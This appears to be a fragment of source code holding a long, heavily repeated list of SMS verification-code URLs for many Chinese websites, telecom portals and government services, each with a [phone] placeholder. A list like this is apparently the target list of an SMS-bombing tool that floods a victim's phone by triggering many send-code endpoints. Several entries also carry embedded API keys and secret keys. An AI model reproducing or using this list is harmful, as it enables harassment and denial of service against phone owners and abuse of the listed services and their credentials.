"http://www.xlcidc.com/chkName.asp?umobie=[phone]&lm=sendmobi&sd=0.5806221691630391", + "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", + "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]&token=0&timestamp=1558355544&sign=c906bc234a2b4ac71ed23cae0147092b", + "http://passport.58.com/mobileauthcodelogin/getcode?valIDAtecode=?=true&source=m-my&callback=jsonp_callback2&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=22", + "http://e.weisns.com.cn/Jsonp/send_mobile_code_reg?callback=jQuery17208124790173017422_1582106551645&mobile=[phone]&token=00-cef055211be84b54a91287fc906bb0d90401bficbagfjjnore2etrosopaqp2rwsslaglw-09fe1fe580b4879abdbabd7ca1f5e26c-5dee0acfe62d2b442088c156&_=1582106605205", + "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://www.51qub.com/member/sendmobilesms?mobile=[phone]", + "http://www.newtank.cn/newtank/act/sendCaptcha.do?activityId=161&channelId=15399&_d=1506594279964&mobile=[phone]&_=1551173567874", + "https://b.hongkedou.com/phoneVerifyCode/getVerificationCode?phone=[phone]&business=buyer-register", + "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", + "https://appapi.moretickets.com/userapi/pub/v1_1/send_sms_for_regist?cellphone=[phone]&code=&isSupportSession=1&src=ios&token=5d3fa06f6d96f74c953459ba&ver=5.1.2", + "http://api.fine3q.com/link-site/api/user/get_verification_code.json?ts=1561901787148&c_id=1&p=a&d_id=861913032338784&ver=3.1.5&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]&hash=9f82736455da1c53", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://appapi.51job.com/api/user/get_verification_type.php?mobilephone=[phone]&nation=CN&type=0&format=json&guid=56fa5d7a032a8190dd9844ebaa211181&partner=237b12de4c48eacec5a368eb192c3c5e&productname=51job&uuid=e7ab248c2ba73cb851a1eb31aa138695&version=869", + "http://www.pureyeah.com/public/api/auth/getVerificationCode?mobile=[phone]&dispatch=", + "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=21", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://gk.huixinyt.com/app1dxxy/index.php/Index/getcode1?1=1&mobile=[phone]&_=1551173567907", + "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://exmail.qq.com:80/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://common.apis.tod.top/v1.1.0/sendsms.php?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://api.xingchentd.com/logic-user/user:users/mobile/?mobile=[phone]&projection=withRoles", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://m.cqrenrenle.com/v3/users/code?mobile=[phone]&from=reg&packagename=com.feifan.app&platform=android", + "https://open.taou.com/maimai/account/v5/send_reg_login_code_v3?ts=1564817141875&access_token=&appid=4&channel=AppStore&density=2&device=iPhone8%2C1&imei=5C351103-F887-4932-BC59-58C75875EFDE&launch_uuid=10c094ac9b334bbda6d4f2d251d0501f&mobile=%2B86-[phone]&net=wifi&", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools ?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]&gCode=", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]&_=1523359575414", + "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://app.aplum.com/user/sendmsg?fromApp=1&phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools%20?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]&gCode=", + "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://www.baixing.com:80/m/oz/verify/reg?mobile=[phone]", + "http://www.easgs.cn/app/index.php?i=8&c=entry&do=sms&m=junsion_winaward_plugin_wap&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=13", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", + "http://m.yhk188.com/register/sendAppRegMsg.dos?channel=1&mobilephone=[phone]&time=8a0aae56fd56e3d023102a88e57a4a594a1625c5769a666d42a35e5b5933c01b&type=1&version=1.6.1", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://webapi.account.mihoyo.com/Api/create_mobile_captcha?action_ticket=&action_type=regist&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://i.360.cn/smsApi/sendsmscode?condition=2&r=&callback=&account=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://srmemberapp.srgow.com/sys/captcha/[phone]", + "https://nhapi02.tv189.com/cpms/Internet?appid=111010310225&phone=[phone]&cliver=1.32.1.6&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834721&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&token=b1fa0dc43dc3ed1b9c4d9cb5f5e57529&pc", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]&_=1523359575414", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=12", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://passport.beva.com/passport/v1/sdk/sendvcode?callback=jQuery111009421744498287961_1580993309090&nonce=1569211859&devcode=1E0D9617438F4A0DBED0AEB20FF19A50&mobile=[phone]&scene=mobilelogin&sign=cba0ddbe3e68126d5d24d2d6342754d6&platform=6&_=1580993309095", + "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone%206s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", + "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=%23code%23%3d321809&key=a68cead9b27523c56ce7fd7fc1312ea4", + "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", + "http://user.app.nanrenbang.in/user/user/getvalidate?phone=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://client.uqbike.com/sms/sendAuthCode.do?accountId=5&phone=[phone]", + "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://open.taou.com/maimai/account/v5/send_reg_login_code_v3?ts=1564817141875&access_token=&appid=4&channel=AppStore&density=2&device=iPhone8%2C1&imei=5C351103-F887-4932-BC59-58C75875EFDE&launch_uuid=10c094ac9b334bbda6d4f2d251d0501f&mobile=%2B86-[phone]&net=wifi&", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://quan.lukou.com/api/sms/verification_code?phone=[phone]&sign=74F59C2BB6F3830D6EB835FDA7550EB7&t=1564024638", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]&_=1535534872440", + "http://www.kaidikeji.com/registerPhoneYzmEx?phone=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://www.milvwang.com/user/isRegister/?mobile_phone=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://login-user.kugou.com/v1/send_sms_for_reg?appid=1014&callback=GetSmsCodeCallbackFn&v=1&verifycode=&ct=1546670699&type=reg&mid=07546126fef194aa4b29a5a80ec7a8d1&kguser_jv=180925&mobile=[phone]", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]&token=", + "https://happy.mail.10086.cn/jsp/cn/club/login/smscode.do?r=0.24631415040371842&usermobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=23", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://114.55.104.205/api/auth/send?mobile=[phone]&access_token=[phone]", + "http://www.pureyeah.com/public/api/auth/getVerificationCode?mobile=[phone]&dispatch=", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=7", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://wx.cq3g.cn/shop/sendSmsCode?phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]&app_code=ECS-YH-WAP", + "http://api-v1.ezpaychain.com/invoice/v1/user/send-sms?calling_codes=%2B86&phone_number=[phone]&type=activation&version=1", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567991", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=14", + "http://dxhz.xqapi.live/api.php?id=[phone]", + "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]&token=d19f72dbe0834107ae2007fc43d8ab79&secret=aKM2o9pwNeUkhmxx5z7RuQ%3D%3D", + "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", + "https://consumer.fcbox.com:443/v1/account/sendCode?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", + "http://m.edaogou.mobi/appweb/user.ashx?act=sendCode&typ=register&mobile=[phone]&_=1551173567948", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://put.zoosnet.net/lr/sendnote160711.aspx?tel=[phone]&ccode=&id=PUT60101350&sid=72a49eb9c9b94b2692a44daa50e2011c&cid=72a49eb9c9b94b2692a44daa50e2011c&lng=cn&p=http%3A//www.lxcpa.net/&e=&un=&ud=&on=&d=1589617104719", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://voip-newapi20160601.voip-oem.com/api/Account/GetValidateCodeNoUser?SrcPhone=[phone]&type=1&proxyId=5318302", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://app.api.ke.com/user/account/sendverifycodeforbindmobilev2?mobile_phone_no=[phone]&request_ts=1564116332", + "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", + "https://login-user.kugou.com/v1/send_sms_for_reg?appid=1014&callback=GetSmsCodeCallbackFn&v=1&verifycode=&ct=1546670699&type=reg&mid=07546126fef194aa4b29a5a80ec7a8d1&kguser_jv=180925&mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "https://appapi.moretickets.com/userapi/pub/v1_1/send_sms_for_regist?cellphone=[phone]&code=&isSupportSession=1&src=ios&token=5d3fa06f6d96f74c953459ba&ver=5.1.2", + "http://srmemberapp.srgow.com/sys/captcha/[phone]", + "http://hall.m.qxiu.com/mobileuser/user/getphonecode?phone=[phone]&sign=8D0A118A972CD8A303403728659FC0F4FA194447", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://www.guiji.ai/market/sms?mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", + "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", + "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://wap.zt.raiyi.com/weixin/bind/verifyMobile?mobile=[phone]&appCode=fc_wx&buyChannel=OfficialAccounts&vtype=0", + "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://h5.gumipet.com/shops_sms_register?phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://n.daoxila.com/verification/appSend?mobile=[phone]&time=1564746677059", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://donutenglish.koolearn.com/api/message/send_vcode?callback=jQuery111009421744498287961_1580993309090&use=5&sign=1CE8E4BE7B71ABA57CBF20762AF78A0C&mobile=[phone]&app_id=29&_=1580993309093", + "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://mobile.health.pingan.com:80/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://i.im.etiantian.net/app-common-service/getPhoneValidateCodeForAixue.do?time=1563804384352&appId=561&typeId=1&uType=6&phoneNum=[phone]&sign=MjhhOTc4YzQ3YjBhZmFhZmRmZDkzY2ViMzRmZmM3ZjA", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://gk.huixinyt.com/app1dxxy/index.php/Index/getcode1?1=1&mobile=[phone]&_=1551173567907", + "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", + "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://api.jzhrj.cn/api/User/SendRegCode?mobile=[phone]&signature=b9ca097bdb7678ffe631d0aecb2615e16b4986f4&timestamp=1558168022&nonce=573&appid=CalendarGPRJ", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", + "http://v2.tgmmvip.com:80/wolong/user/getphonecode?phone=[phone]&deviceid=864680046080077&type=0", + "https://api.intsig.net/user/cs/send_emailsms_with_verify?account=[phone]&account_type=mobile&area_code=86&client_app=CamScanner_IP_FREE%405.12.1.1907311855&device_id=4f06e7989623c84b4c88dddc46724ea2&language=zh-cn&type=login_via_vcode", + "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]&token=0&timestamp=1558355544&sign=c906bc234a2b4ac71ed23cae0147092b", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=App%20Store&ip=192.168.43.151&mobile=[phone]&udid=5WklXEFrvscsddZR8s3TrLI45Bg0YEW9MkEFqRLSrR1ZKpY81h2wTw8pEHBo", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://bj.iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", + "https://passport.xueweigui.com/mobile/sendCode?mobile=[phone]&op=10&k=d12c14cc39c8a48be8c181e401e4b962", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://www.zhiguker.com/index/user/regYzm?phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://koudaitong.com/v2/common/sms/captcha.jsonp?callback=jQuery1102020099561656467435_1430461129946&verifyTimes=1&biz=kdt_account_captcha&_=1430461129949&mobile=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://doc.u-ease.com:80/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://yueban.500zhuan.com/tools/getNum?&phone=[phone]&sign=20f2f798a813a8115f5a837c7cad140b&timestamp=1566033453", + "https://api.1sapp.com/captcha/getSmsCaptcha?GUID=9b079137577015d58e0428cbae5.61417812&OSVersion=12.4&active_method=icon&deviceCode=5C351103-F887-4932-BC59-58C75875EFDE&distinct_id=&dtu=100&lat=29.58959433282935&lon=106.281065329089&network=WIFI&sign=73ffc97fcc0d33c", + "http://yueban.500zhuan.com/tools/getNum?&phone=[phone]&sign=20f2f798a813a8115f5a837c7cad140b&timestamp=1566033453", + "http://m.tk.cn:80/tkmobile/orderSentSmsServlet?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://soufunapp.3g.fang.com/http/sfservice.jsp?messagename=appSendMobileCode&mobilephone=[phone]&operatetype=0&sendvoice=0&wirelesscode=2C56469F49A8526BC922ECFA14C22AC7", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://b.hongkedou.com/phoneVerifyCode/getVerificationCode?phone=[phone]&business=buyer-register", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://www.txooo.com/Txooo/Main/Busine**屏蔽敏感词**equirement/Ajax/Busine**屏蔽敏感词**equirementAjax.ajax/SendMobileCode?mobile=[phone]", + "http://www.51qub.com/member/sendmobilesms?mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]&action=codeLogin&type=sms&client=android&version=2.4", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://user.daojia.com/user/getSmscode?mobile=[phone]&bu=", + "https://ubas.360jie.com.cn/ubas/event/report?flowNo=49181563973602947&bizCode=REGISTER_LOGIN&eventCode=SEND_SMSCODE&pageName=login.html&ABTest=A&TuanABTest=A&userOprTime=1563973631831&hostApp=APP&sourceType=APK&channelSource=CH_001_IOS&subChannel=&activityInfo=&utm", + "http://i.vaakwe.com/user/reg_send_code.php?mobile=[phone]&country=0086&udid=a884f6c7f15ff08a97ab16e4d33fe2c216a9ebed&imei=02:00:00:00:00:00&mac=02:00:00:00:00:00&imsi=02:00:00:00:00:00&token=ba4edbf30bc5363ba02875fc4c6b25c8a21ed8a99e21c5c40ff6385c43c71c8b&type=sms&", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://jieapi.profacty.cn/api/verification/sendPhone?phone=[phone]&type=102&timestamp=1559301154413&sign=e720200313338403aaa8e13a3f333da7", + "http://group.leying.com/user/send-login-or-reg-validate-code?.sig=485fcbb8de19a6031a640e4fba81b7d7&cinema_id=23&city_id=502&client_id=3e5da9998f896&graph_validate_code=&group=20008&mobile=[phone]&pver=7.0&session_id=&source=105001&ver=5.5.5", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=25", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://m.rong360.com/mobile/Wxpageforapp/SendSmsVcode?mobile=[phone]&callback=rong_json1565594522310&v=7620", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]", + "https://happy.mail.10086.cn/jsp/cn/club/login/smscode.do?r=0.24631415040371842&usermobile=[phone]", + "https://jdapi.jd100.com/uc/v1/getSMSCode?account=[phone]&sign_type=1&use_type=1", + "http://my.baihe.com/Getinterregist/captchaAndRegCheck?account=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=21", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://www.baixing.com/oz/verify/reg?mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://doc.u-ease.com/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://app.api.lianjia.com/user/account/sendVerifyCodeForRegisterV2?mobile_phone_no=[phone]&request_ts=1564114069", + 